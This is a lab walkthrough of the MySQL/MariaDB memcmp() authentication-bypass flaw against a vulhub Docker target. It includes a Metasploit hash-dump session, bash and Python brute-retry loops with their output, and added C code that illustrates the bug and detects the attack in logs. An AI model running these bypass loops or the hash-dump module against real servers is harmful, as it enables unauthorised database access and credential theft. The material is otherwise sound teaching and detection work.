When a client connects to MariaDB/MySQL, the supplied password is compared with the expected correct password. Because the result of that comparison is handled incorrectly, MySQL can conclude that the two passwords are identical even when memcmp() returns a non-zero value.
The root cause is that the return value of memcmp() is treated as if it always fell within the signed-char range (-128 to 127). In practice the flaw is only exploitable on Linux systems whose GNU C library ships an SSE-optimised memcmp(), and the probability of triggering it on any single attempt is roughly 1 in 256.
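To make that narrowing concrete, the following C program is an added illustration (it is not code from the original post, nor MySQL's own source). It mirrors the shape of the flawed check, a memcmp() result stored into MySQL's one-byte my_bool type, beside the corrected form and a constant-time hash comparison. The memcmp() values are fed in directly as constructed inputs, because whether the real library returns values outside -128..127 depends entirely on its optimised implementation.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* MySQL's my_bool is a plain char: storing an int into it keeps only the low 8 bits. */
typedef char my_bool;

#define SHA1_HASH_SIZE 20

/* Flawed shape (an illustration of the pattern the post describes, not MySQL's source):
 * the int from memcmp() is returned through a my_bool, so 256, 512, ... become 0,
 * and 0 is exactly what the caller takes as "passwords match". */
my_bool check_scramble_truncating(int memcmp_result)
{
    return memcmp_result;           /* implicit int -> char narrowing happens here */
}

/* Corrected shape: collapse the result to 0 or 1 before any narrowing can happen. */
my_bool check_scramble_fixed(int memcmp_result)
{
    return memcmp_result != 0;
}

/* Constant-time equality for fixed-size hashes: returns 1 if equal, 0 otherwise.
 * The OR-accumulator never leaves one byte, so there is nothing to truncate,
 * and the loop does not exit early on the first differing byte. */
int hashes_equal_ct(const unsigned char *a, const unsigned char *b, size_t n)
{
    unsigned char acc = 0;
    for (size_t i = 0; i < n; i++)
        acc |= (unsigned char)(a[i] ^ b[i]);
    return acc == 0;
}

int main(void)
{
    /* Constructed sample: two SHA1-sized buffers that differ only in the first byte. */
    unsigned char expected[SHA1_HASH_SIZE] = {0x6b, 0xb4, 0x83, 0x7e};
    unsigned char supplied[SHA1_HASH_SIZE] = {0x00, 0xb4, 0x83, 0x7e};
    /* Constructed memcmp() return values; 256 and 512 are the dangerous ones. */
    int results[] = {1, -1, 255, 256, 512};

    for (size_t i = 0; i < sizeof results / sizeof results[0]; i++)
        printf("memcmp()=%4d  truncating->%s  fixed->%s\n", results[i],
               check_scramble_truncating(results[i]) == 0 ? "MATCH" : "reject",
               check_scramble_fixed(results[i]) == 0 ? "MATCH" : "reject");

    printf("constant-time compare of differing hashes: %d\n",
           hashes_equal_ct(expected, supplied, SHA1_HASH_SIZE));
    printf("real memcmp() on the same buffers: %d\n",
           memcmp(expected, supplied, SHA1_HASH_SIZE));
    return 0;
}
```

The point of the constant-time variant is not only the missing early exit: an accumulator that is already a single byte cannot be mangled by a later narrowing conversion, which is the whole failure mode here.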
Affected versions:
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not affected.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected.
The lab environment is a Docker container built with vulhub.
Configuration: mysql (version 5.5.23), credentials root/123456
metasploit

```
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 192.168.31.23
RHOSTS => 192.168.31.23
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.31.23:3306 - 192.168.31.23:3306 The server allows logins, proceeding with bypass test
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully bypassed authentication after 64 attempts. URI: mysql://root:ZoSnI@192.168.31.23:3306
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Hash Table has been saved: /root/.msf4/loot/20190714220813_default_192.168.31.23_mysql.hashes_963184.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
bash

```bash
for i in `seq 1 1000`; do mysql -u root --password=bad -h IP 2>/dev/null; done
```

```
root@kali:~# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.31.23 2>/dev/null; done
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 6065
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| test               |
+--------------------+
4 rows in set (0.00 sec)

MySQL [(none)]>
```
python

Code:

```python
#!/usr/bin/python
# a.py
import subprocess

# Keep reconnecting with a wrong password until the flawed comparison
# accepts one of the attempts (IP is the lab target host).
while 1:
    subprocess.Popen("mysql -u root mysql -h IP --password=baah", shell=True).wait()
```

Result:

```
root@kali:~# python a.py
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
......
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 8064
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [mysql]>
```
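Seen from the server side, both sessions above leave the same signature: a burst of "Access denied" events from one client followed by a successful connection from that same client without any credential change in between. The C program below is an added example, not part of the original post or of any MySQL tooling: it scans a constructed set of log lines (loosely modelled on the MySQL 5.5 error log with log_warnings=2 and on the general log; the exact line formats are an assumption) and flags any host whose successful connect was preceded by at least a threshold of denials.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_HOSTS 16
#define HOST_LEN  64

/* Constructed sample log (assumption: loosely modelled on the MySQL 5.5 error log with
 * log_warnings=2 and on the general log; not captured from a real server). */
static const char *const SAMPLE_LOG[] = {
    "190714 22:08:01 [Warning] Access denied for user 'root'@'192.168.31.22' (using password: YES)",
    "190714 22:08:01 [Warning] Access denied for user 'root'@'192.168.31.22' (using password: YES)",
    "190714 22:08:02 [Warning] Access denied for user 'root'@'192.168.31.50' (using password: YES)",
    "190714 22:08:02 [Warning] Access denied for user 'root'@'192.168.31.22' (using password: YES)",
    "190714 22:08:03 [Note] Event Scheduler: Loaded 0 events",
    "190714 22:08:03 [Warning] Access denied for user 'root'@'192.168.31.22' (using password: YES)",
    "190714 22:08:05\t 6001 Connect\troot@192.168.31.50 on mysql",
    "190714 22:08:13\t 6065 Connect\troot@192.168.31.22 on",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

struct host_stat { char host[HOST_LEN]; int failures; };

/* Find or create the per-host counter; NULL when the small fixed table is full. */
static struct host_stat *lookup(struct host_stat *tbl, size_t *used, const char *host)
{
    for (size_t i = 0; i < *used; i++)
        if (strcmp(tbl[i].host, host) == 0)
            return &tbl[i];
    if (*used >= MAX_HOSTS)
        return NULL;
    snprintf(tbl[*used].host, HOST_LEN, "%s", host);
    tbl[*used].failures = 0;
    return &tbl[(*used)++];
}

/* Copy the host out of user@'host' or user@host; p points just past the '@'. */
static int extract_host(const char *p, char *out, size_t cap)
{
    size_t i = 0;
    if (*p == '\'')
        p++;
    while (*p && *p != '\'' && *p != ' ' && i + 1 < cap)
        out[i++] = *p++;
    out[i] = '\0';
    return i > 0;
}

/* Walk the lines in order. On the first successful Connect that was preceded by
 * >= threshold denied attempts from the same host, copy that host into flagged
 * and return the number of denials. Returns 0 (flagged empty) if nothing matched. */
int scan_for_bypass(const char *const *lines, size_t nlines, int threshold,
                    char *flagged, size_t cap)
{
    struct host_stat tbl[MAX_HOSTS];
    size_t used = 0;
    char host[HOST_LEN];

    for (size_t k = 0; k < nlines; k++) {
        const char *p;
        int success;
        if ((p = strstr(lines[k], "Access denied for user")) != NULL)
            success = 0;
        else if ((p = strstr(lines[k], "Connect\t")) != NULL)
            success = 1;
        else
            continue;                                   /* unrelated line */
        if ((p = strchr(p, '@')) == NULL || !extract_host(p + 1, host, sizeof host))
            continue;
        struct host_stat *s = lookup(tbl, &used, host);
        if (s == NULL)
            continue;
        if (!success) {
            s->failures++;
            continue;
        }
        int before = s->failures;
        s->failures = 0;                                /* a success closes the window */
        if (before >= threshold) {
            snprintf(flagged, cap, "%s", host);
            return before;
        }
    }
    if (cap)
        flagged[0] = '\0';
    return 0;
}

/* Convenience wrapper over the embedded sample log. */
int scan_sample(int threshold, char *flagged, size_t cap)
{
    return scan_for_bypass(SAMPLE_LOG, SAMPLE_LOG_LEN, threshold, flagged, cap);
}

int main(void)
{
    char flagged[HOST_LEN];
    int n = scan_sample(3, flagged, sizeof flagged);
    if (n)
        printf("possible auth bypass: %s connected after %d denials\n", flagged, n);
    else
        printf("no suspicious failure-then-success pattern\n");
    return 0;
}
```

With a threshold of 3 the sample flags 192.168.31.22 after four denials, while 192.168.31.50 (one denial, then a normal connect) is left alone; on a real server the threshold should sit well below the roughly 256 attempts the bypass needs on average, and the counter should additionally be bounded by a time window.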
References:
https://www.freebuf.com/vuls/3815.html
https://www.jianshu.com/p/909bfe51c468